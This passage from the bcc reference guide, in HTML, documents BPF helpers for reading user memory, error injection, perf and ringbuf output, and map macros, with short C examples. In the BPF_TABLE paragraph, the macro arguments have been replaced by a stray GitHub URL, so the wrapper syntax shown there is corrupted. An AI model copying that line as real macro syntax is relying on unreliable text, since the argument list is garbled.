<a href="https://github.com/iovisor/bcc/search?q=bpf_get_prandom_u32+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-bpf_probe_read_user"><a class="header" href="#10-bpf_probe_read_user">10. bpf_probe_read_user()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_user(void *dst, int size, const void *src)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>This attempts to safely read size bytes from user address space to the BPF stack, so that BPF can later operate on it. For safety, all user address space memory reads must pass through bpf_probe_read_user().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="11-bpf_probe_read_user_str"><a class="header" href="#11-bpf_probe_read_user_str">11. bpf_probe_read_user_str()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_user_str(void *dst, int size, const void *src)</code></p>
|
||
<p>Return:</p>
|
||
<ul>
|
||
<li>> 0 length of the string including the trailing NULL on success</li>
|
||
<li>< 0 error</li>
|
||
</ul>
|
||
<p>This copies a <code>NULL</code> terminated string from user address space to the BPF stack, so that BPF can later operate on it. In case the string length is smaller than size, the target is not padded with further <code>NULL</code> bytes. In case the string length is larger than size, just <code>size - 1</code> bytes are copied and the last byte is set to <code>NULL</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user_str+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_user_str+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="12-bpf_get_ns_current_pid_tgid"><a class="header" href="#12-bpf_get_ns_current_pid_tgid">12. bpf_get_ns_current_pid_tgid()</a></h3>
|
||
<p>Syntax: <code>u32 bpf_get_ns_current_pid_tgid(u64 dev, u64 ino, struct bpf_pidns_info* nsdata, u32 size)</code></p>
|
||
<p>Values for <em>pid</em> and <em>tgid</em> as seen from the current <em>namespace</em> will be returned in <em>nsdata</em>.</p>
|
||
<p>Return 0 on success, or one of the following in case of failure:</p>
|
||
<ul>
|
||
<li>
|
||
<p><strong>-EINVAL</strong> if dev and inum supplied don't match dev_t and inode number with nsfs of current task, or if dev conversion to dev_t lost high bits.</p>
|
||
</li>
|
||
<li>
|
||
<p><strong>-ENOENT</strong> if pidns does not exists for the current task.</p>
|
||
</li>
|
||
</ul>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_ns_current_pid_tgid+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_get_ns_current_pid_tgid+path%3Atools&type=Code">search /tools</a></p>
|
||
<h2 id="debugging"><a class="header" href="#debugging">Debugging</a></h2>
|
||
<h3 id="1-bpf_override_return"><a class="header" href="#1-bpf_override_return">1. bpf_override_return()</a></h3>
|
||
<p>Syntax: <code>int bpf_override_return(struct pt_regs *, unsigned long rc)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>When used in a program attached to a function entry kprobe, causes the
|
||
execution of the function to be skipped, immediately returning <code>rc</code> instead.
|
||
This is used for targeted error injection.</p>
|
||
<p>bpf_override_return will only work when the kprobed function is whitelisted to
|
||
allow error injections. Whitelisting entails tagging a function with
|
||
<code>ALLOW_ERROR_INJECTION()</code> in the kernel source tree; see <code>io_ctl_init</code> for
|
||
an example. If the kprobed function is not whitelisted, the bpf program will
|
||
fail to attach with <code> ioctl(PERF_EVENT_IOC_SET_BPF): Invalid argument</code></p>
|
||
<pre><code class="language-C">int kprobe__io_ctl_init(void *ctx) {
|
||
bpf_override_return(ctx, -ENOMEM);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<h2 id="output"><a class="header" href="#output">Output</a></h2>
|
||
<h3 id="1-bpf_trace_printk"><a class="header" href="#1-bpf_trace_printk">1. bpf_trace_printk()</a></h3>
|
||
<p>Syntax: <code>int bpf_trace_printk(const char *fmt, ...)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A simple kernel facility for printf() to the common trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is ok for some quick examples, but has limitations: 3 args max, 1 %s only, and trace_pipe is globally shared, so concurrent programs will have clashing output. A better interface is via BPF_PERF_OUTPUT(). Note that calling this helper is made simpler than the original kernel version, which has <code>fmt_size</code> as the second parameter.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_trace_printk+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_trace_printk+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="2-bpf_perf_output"><a class="header" href="#2-bpf_perf_output">2. BPF_PERF_OUTPUT</a></h3>
|
||
<p>Syntax: <code>BPF_PERF_OUTPUT(name)</code></p>
|
||
<p>Creates a BPF table for pushing out custom event data to user space via a perf ring buffer. This is the preferred method for pushing per-event data to user space.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
|
||
int hello(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.perf_submit(ctx, &data, sizeof(data));
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The output table is named <code>events</code>, and data is pushed to it via <code>events.perf_submit()</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_OUTPUT+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_OUTPUT+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-perf_submit"><a class="header" href="#3-perf_submit">3. perf_submit()</a></h3>
|
||
<p>Syntax: <code>int perf_submit((void *)ctx, (void *)data, u32 data_size)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A method of a BPF_PERF_OUTPUT table, for submitting custom event data to user space. See the BPF_PERF_OUTPUT entry. (This ultimately calls bpf_perf_event_output().)</p>
|
||
<p>The <code>ctx</code> parameter is provided in <a href="bcc-documents/reference_guide.html#1-kprobes">kprobes</a> or <a href="bcc-documents/reference_guide.html#2-kretprobes">kretprobes</a>. For <code>SCHED_CLS</code> or <code>SOCKET_FILTER</code> programs, the <code>struct __sk_buff *skb</code> must be used instead.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-perf_submit_skb"><a class="header" href="#4-perf_submit_skb">4. perf_submit_skb()</a></h3>
|
||
<p>Syntax: <code>int perf_submit_skb((void *)ctx, u32 packet_size, (void *)data, u32 data_size)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>A method of a BPF_PERF_OUTPUT table available in networking program types, for submitting custom event data to user space, along with the first <code>packet_size</code> bytes of the packet buffer. See the BPF_PERF_OUTPUT entry. (This ultimately calls bpf_perf_event_output().)</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit_skb+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_submit_skb+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_ringbuf_output"><a class="header" href="#5-bpf_ringbuf_output">5. BPF_RINGBUF_OUTPUT</a></h3>
|
||
<p>Syntax: <code>BPF_RINGBUF_OUTPUT(name, page_cnt)</code></p>
|
||
<p>Creates a BPF table for pushing out custom event data to user space via a ringbuf ring buffer.
|
||
<code>BPF_RINGBUF_OUTPUT</code> has several advantages over <code>BPF_PERF_OUTPUT</code>, summarized as follows:</p>
|
||
<ul>
|
||
<li>Buffer is shared across all CPUs, meaning no per-CPU allocation</li>
|
||
<li>Supports two APIs for BPF programs
|
||
<ul>
|
||
<li><code>map.ringbuf_output()</code> works like <code>map.perf_submit()</code> (covered in <a href="bcc-documents/reference_guide.html#6-ringbuf_output">ringbuf_output</a>)</li>
|
||
<li><code>map.ringbuf_reserve()</code>/<code>map.ringbuf_submit()</code>/<code>map.ringbuf_discard()</code>
|
||
split the process of reserving buffer space and submitting events into two steps
|
||
(covered in <a href="bcc-documents/reference_guide.html#7-ringbuf_reserve">ringbuf_reserve</a>, <a href="bcc-documents/reference_guide.html#8-ringbuf_submit">ringbuf_submit</a>, <a href="bcc-documents/reference_guide.html#9-ringbuf_discard">ringbuf_discard</a>)</li>
|
||
</ul>
|
||
</li>
|
||
<li>BPF APIs do not require access to a CPU ctx argument</li>
|
||
<li>Superior performance and latency in userspace thanks to a shared ring buffer manager</li>
|
||
<li>Supports two ways of consuming data in userspace</li>
|
||
</ul>
|
||
<p>Starting in Linux 5.8, this should be the preferred method for pushing per-event data to user space.</p>
|
||
<p>Example of both APIs:</p>
|
||
<pre><code class="language-C">struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
// Creates a ringbuf called events with 8 pages of space, shared across all CPUs
|
||
BPF_RINGBUF_OUTPUT(events, 8);
|
||
|
||
int first_api_example(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.ringbuf_output(&data, sizeof(data), 0 /* flags */);
|
||
|
||
return 0;
|
||
}
|
||
|
||
int second_api_example(struct pt_regs *ctx) {
|
||
struct data_t *data = events.ringbuf_reserve(sizeof(struct data_t));
|
||
if (!data) { // Failed to reserve space
|
||
return 1;
|
||
}
|
||
|
||
data->pid = bpf_get_current_pid_tgid();
|
||
data->ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data->comm, sizeof(data->comm));
|
||
|
||
events.ringbuf_submit(data, 0 /* flags */);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>The output table is named <code>events</code>. Data is allocated via <code>events.ringbuf_reserve()</code> and pushed to it via <code>events.ringbuf_submit()</code>.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_RINGBUF_OUTPUT+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="6-ringbuf_output"><a class="header" href="#6-ringbuf_output">6. ringbuf_output()</a></h3>
|
||
<p>Syntax: <code>int ringbuf_output((void *)data, u64 data_size, u64 flags)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not sent notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for submitting custom event data to user space. This method works like <code>perf_submit()</code>,
|
||
although it does not require a ctx argument.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_output+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="7-ringbuf_reserve"><a class="header" href="#7-ringbuf_reserve">7. ringbuf_reserve()</a></h3>
|
||
<p>Syntax: <code>void* ringbuf_reserve(u64 data_size)</code></p>
|
||
<p>Return: Pointer to data struct on success, NULL on failure</p>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for reserving space in the ring buffer and simultaenously
|
||
allocating a data struct for output. Must be used with one of <code>ringbuf_submit</code> or <code>ringbuf_discard</code>.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_reserve+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="8-ringbuf_submit"><a class="header" href="#8-ringbuf_submit">8. ringbuf_submit()</a></h3>
|
||
<p>Syntax: <code>void ringbuf_submit((void *)data, u64 flags)</code></p>
|
||
<p>Return: Nothing, always succeeds</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not sent notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for submitting custom event data to user space. Must be preceded by a call to
|
||
<code>ringbuf_reserve()</code> to reserve space for the data.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_submit+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="9-ringbuf_discard"><a class="header" href="#9-ringbuf_discard">9. ringbuf_discard()</a></h3>
|
||
<p>Syntax: <code>void ringbuf_discard((void *)data, u64 flags)</code></p>
|
||
<p>Return: Nothing, always succeeds</p>
|
||
<p>Flags:</p>
|
||
<ul>
|
||
<li><code>BPF_RB_NO_WAKEUP</code>: Do not sent notification of new data availability</li>
|
||
<li><code>BPF_RB_FORCE_WAKEUP</code>: Send notification of new data availability unconditionally</li>
|
||
</ul>
|
||
<p>A method of the BPF_RINGBUF_OUTPUT table, for discarding custom event data; userspace
|
||
ignores the data associated with the discarded event. Must be preceded by a call to
|
||
<code>ringbuf_reserve()</code> to reserve space for the data.</p>
|
||
<p>Examples in situ: <!-- TODO -->
|
||
<a href="https://github.com/iovisor/bcc/search?q=ringbuf_submit+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h2 id="maps"><a class="header" href="#maps">Maps</a></h2>
|
||
<p>Maps are BPF data stores, and are the basis for higher level object types including tables, hashes, and histograms.</p>
|
||
<h3 id="1-bpf_table"><a class="header" href="#1-bpf_table">1. BPF_TABLE</a></h3>
|
||
<p>Syntax: <code>BPF_TABLE(_table_type, _key_type, _leaf_type, _name, _max_entries)</code></p>
|
||
<p>Creates a map named <code>_name</code>. Most of the time this will be used via higher-level macros, like BPF_HASH, BPF_ARRAY, BPF_HISTOGRAM, etc.</p>
|
||
<p><code>BPF_F_TABLE</code> is a variant that takes a flag in the last parameter. <code>BPF_TABLE(https://github.com/iovisor/bcc/tree/master.)</code> is actually a wrapper to <code>BPF_F_TABLE(https://github.com/iovisor/bcc/tree/master., 0 /* flag */)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_TABLE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_TABLE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h4 id="pinned-maps"><a class="header" href="#pinned-maps">Pinned Maps</a></h4>
|
||
<p>Syntax: <code>BPF_TABLE_PINNED(_table_type, _key_type, _leaf_type, _name, _max_entries, "/sys/fs/bpf/xyz")</code></p>
|
||
<p>Create a new map if it doesn't exist and pin it to the bpffs as a FILE, otherwise use the map that was pinned to the bpffs. The type information is not enforced and the actual map type depends on the map that got pinned to the location.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_TABLE_PINNED("hash", u64, u64, ids, 1024, "/sys/fs/bpf/ids");
|
||
</code></pre>
|
||
<h3 id="2-bpf_hash"><a class="header" href="#2-bpf_hash">2. BPF_HASH</a></h3>
|
||
<p>Syntax: <code>BPF_HASH(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates a hash map (associative array) named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_HASH(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HASH(start, struct request *);
|
||
</code></pre>
|
||
<p>This creates a hash named <code>start</code> where the key is a <code>struct request *</code>, and the value defaults to u64. This hash is used by the disksnoop.py example for saving timestamps for each I/O request, where the key is the pointer to struct request, and the value is the timestamp.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("hash", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HASH+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HASH+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-bpf_array"><a class="header" href="#3-bpf_array">3. BPF_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_ARRAY(name [, leaf_type [, size]])</code></p>
|
||
<p>Creates an int-indexed array which is optimized for fastest lookup and update, named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_ARRAY(name, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_ARRAY(counts, u64, 32);
|
||
</code></pre>
|
||
<p>This creates an array named <code>counts</code> where with 32 buckets and 64-bit integer values. This array is used by the funccount.py example for saving call count of each function.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("array", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.update(), map.increment(). Note that all array elements are pre-allocated with zero values and can not be deleted.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_ARRAY+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-bpf_histogram"><a class="header" href="#4-bpf_histogram">4. BPF_HISTOGRAM</a></h3>
|
||
<p>Syntax: <code>BPF_HISTOGRAM(name [, key_type [, size ]])</code></p>
|
||
<p>Creates a histogram map named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_HISTOGRAM(name, key_type=int, size=64)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HISTOGRAM(dist);
|
||
</code></pre>
|
||
<p>This creates a histogram named <code>dist</code>, which defaults to 64 buckets indexed by keys of type int.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("histgram", ...)</code>.</p>
|
||
<p>Methods (covered later): map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HISTOGRAM+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_HISTOGRAM+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="5-bpf_stack_trace"><a class="header" href="#5-bpf_stack_trace">5. BPF_STACK_TRACE</a></h3>
|
||
<p>Syntax: <code>BPF_STACK_TRACE(name, max_entries)</code></p>
|
||
<p>Creates stack trace map named <code>name</code>, with a maximum entry count provided. These maps are used to store stack traces.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_STACK_TRACE(stack_traces, 1024);
|
||
</code></pre>
|
||
<p>This creates stack trace map named <code>stack_traces</code>, with a maximum number of stack trace entries of 1024.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("stacktrace", ...)</code>.</p>
|
||
<p>Methods (covered later): map.get_stackid().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK_TRACE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_STACK_TRACE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="6-bpf_perf_array"><a class="header" href="#6-bpf_perf_array">6. BPF_PERF_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PERF_ARRAY(name, max_entries)</code></p>
|
||
<p>Creates perf array named <code>name</code>, with a maximum entry count provided, which must be equal to the number of system cpus. These maps are used to fetch hardware performance counters.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">text="""
|
||
BPF_PERF_ARRAY(cpu_cycles, NUM_CPUS);
|
||
"""
|
||
b = bcc.BPF(text=text, cflags=["-DNUM_CPUS=%d" % multiprocessing.cpu_count()])
|
||
b["cpu_cycles"].open_perf_event(b["cpu_cycles"].HW_CPU_CYCLES)
|
||
</code></pre>
|
||
<p>This creates a perf array named <code>cpu_cycles</code>, with number of entries equal to the number of cpus/cores. The array is configured so that later calling map.perf_read() will return a hardware-calculated counter of the number of cycles elapsed from some point in the past. Only one type of hardware counter may be configured per table at a time.</p>
|
||
<p>Methods (covered later): map.perf_read().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERF_ARRAY+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="7-bpf_percpu_hash"><a class="header" href="#7-bpf_percpu_hash">7. BPF_PERCPU_HASH</a></h3>
|
||
<p>Syntax: <code>BPF_PERCPU_HASH(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates NUM_CPU int-indexed hash maps (associative arrays) named <code>name</code>, with optional parameters. Each CPU will have a separate copy of this array. The copies are not kept synchronized in any way.</p>
|
||
<p>Note that due to limits defined in the kernel (in linux/mm/percpu.c), the <code>leaf_type</code> cannot have a size of more than 32KB.
|
||
In other words, <code>BPF_PERCPU_HASH</code> elements cannot be larger than 32KB in size.</p>
|
||
<p>Defaults: <code>BPF_PERCPU_HASH(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PERCPU_HASH(start, struct request *);
|
||
</code></pre>
|
||
<p>This creates NUM_CPU hashes named <code>start</code> where the key is a <code>struct request *</code>, and the value defaults to u64.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("percpu_hash", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_HASH+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_HASH+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-bpf_percpu_array"><a class="header" href="#8-bpf_percpu_array">8. BPF_PERCPU_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PERCPU_ARRAY(name [, leaf_type [, size]])</code></p>
|
||
<p>Creates NUM_CPU int-indexed arrays which are optimized for fastest lookup and update, named <code>name</code>, with optional parameters. Each CPU will have a separate copy of this array. The copies are not kept synchronized in any way.</p>
|
||
<p>Note that due to limits defined in the kernel (in linux/mm/percpu.c), the <code>leaf_type</code> cannot have a size of more than 32KB.
|
||
In other words, <code>BPF_PERCPU_ARRAY</code> elements cannot be larger than 32KB in size.</p>
|
||
<p>Defaults: <code>BPF_PERCPU_ARRAY(name, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_PERCPU_ARRAY(counts, u64, 32);
|
||
</code></pre>
|
||
<p>This creates NUM_CPU arrays named <code>counts</code> where with 32 buckets and 64-bit integer values.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("percpu_array", ...)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.update(), map.increment(). Note that all array elements are pre-allocated with zero values and can not be deleted.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PERCPU_ARRAY+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="9-bpf_lpm_trie"><a class="header" href="#9-bpf_lpm_trie">9. BPF_LPM_TRIE</a></h3>
|
||
<p>Syntax: <code>BPF_LPM_TRIE(name [, key_type [, leaf_type [, size]]])</code></p>
|
||
<p>Creates a longest prefix match trie map named <code>name</code>, with optional parameters.</p>
|
||
<p>Defaults: <code>BPF_LPM_TRIE(name, key_type=u64, leaf_type=u64, size=10240)</code></p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-c">BPF_LPM_TRIE(trie, struct key_v6);
|
||
</code></pre>
|
||
<p>This creates an LPM trie map named <code>trie</code> where the key is a <code>struct key_v6</code>, and the value defaults to u64.</p>
|
||
<p>This is a wrapper macro to <code>BPF_F_TABLE("lpm_trie", ..., BPF_F_NO_PREALLOC)</code>.</p>
|
||
<p>Methods (covered later): map.lookup(), map.lookup_or_try_init(), map.delete(), map.update(), map.insert(), map.increment().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_LPM_TRIE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_LPM_TRIE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-bpf_prog_array"><a class="header" href="#10-bpf_prog_array">10. BPF_PROG_ARRAY</a></h3>
|
||
<p>Syntax: <code>BPF_PROG_ARRAY(name, size)</code></p>
|
||
<p>This creates a program array named <code>name</code> with <code>size</code> entries. Each entry of the array is either a file descriptor to a bpf program or <code>NULL</code>. The array acts as a jump table so that bpf programs can "tail-call" other bpf programs.</p>
|
||
<p>This is a wrapper macro for <code>BPF_TABLE("prog", ...)</code>.</p>
|
||
<p>Methods (covered later): map.call().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PROG_ARRAY+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_PROG_ARRAY+path%3Atests&type=Code">search /tests</a>,
|
||
<a href="https://github.com/iovisor/bcc/blob/master/examples/networking/tunnel_monitor/monitor.py#L24-L26">assign fd</a></p>
|
||
<h3 id="11-bpf_devmap"><a class="header" href="#11-bpf_devmap">11. BPF_DEVMAP</a></h3>
|
||
<p>Syntax: <code>BPF_DEVMAP(name, size)</code></p>
|
||
<p>This creates a device map named <code>name</code> with <code>size</code> entries. Each entry of the map is an <code>ifindex</code> to a network interface. This map is only used in XDP.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_DEVMAP(devmap, 10);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_DEVMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="12-bpf_cpumap"><a class="header" href="#12-bpf_cpumap">12. BPF_CPUMAP</a></h3>
|
||
<p>Syntax: <code>BPF_CPUMAP(name, size)</code></p>
|
||
<p>This creates a cpu map named <code>name</code> with <code>size</code> entries. The index of the map represents the CPU id and each entry is the size of the ring buffer allocated for the CPU. This map is only used in XDP.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_CPUMAP(cpumap, 16);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_CPUMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="13-bpf_xskmap"><a class="header" href="#13-bpf_xskmap">13. BPF_XSKMAP</a></h3>
|
||
<p>Syntax: <code>BPF_XSKMAP(name, size [, "/sys/fs/bpf/xyz"])</code></p>
|
||
<p>This creates a xsk map named <code>name</code> with <code>size</code> entries and pin it to the bpffs as a FILE. Each entry represents one NIC's queue id. This map is only used in XDP to redirect packet to an AF_XDP socket. If the AF_XDP socket is binded to a queue which is different than the current packet's queue id, the packet will be dropped. For kernel v5.3 and latter, <code>lookup</code> method is available and can be used to check whether and AF_XDP socket is available for the current packet's queue id. More details at <a href="https://www.kernel.org/doc/html/latest/networking/af_xdp.html">AF_XDP</a>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_XSKMAP(xsks_map, 8);
|
||
</code></pre>
|
||
<p>Methods (covered later): map.redirect_map(). map.lookup()</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=BPF_XSKMAP+path%3Aexamples&type=Code">search /examples</a>,</p>
|
||
<h3 id="14-bpf_array_of_maps"><a class="header" href="#14-bpf_array_of_maps">14. BPF_ARRAY_OF_MAPS</a></h3>
|
||
<p>Syntax: <code>BPF_ARRAY_OF_MAPS(name, inner_map_name, size)</code></p>
|
||
<p>This creates an array map with a map-in-map type (BPF_MAP_TYPE_HASH_OF_MAPS) map named <code>name</code> with <code>size</code> entries. The inner map meta data is provided by map <code>inner_map_name</code> and can be most of array or hash maps except <code>BPF_MAP_TYPE_PROG_ARRAY</code>, <code>BPF_MAP_TYPE_CGROUP_STORAGE</code> and <code>BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_TABLE("hash", int, int, ex1, 1024);
|
||
BPF_TABLE("hash", int, int, ex2, 1024);
|
||
BPF_ARRAY_OF_MAPS(maps_array, "ex1", 10);
|
||
</code></pre>
|
||
<h3 id="15-bpf_hash_of_maps"><a class="header" href="#15-bpf_hash_of_maps">15. BPF_HASH_OF_MAPS</a></h3>
|
||
<p>Syntax: <code>BPF_HASH_OF_MAPS(name, key_type, inner_map_name, size)</code></p>
|
||
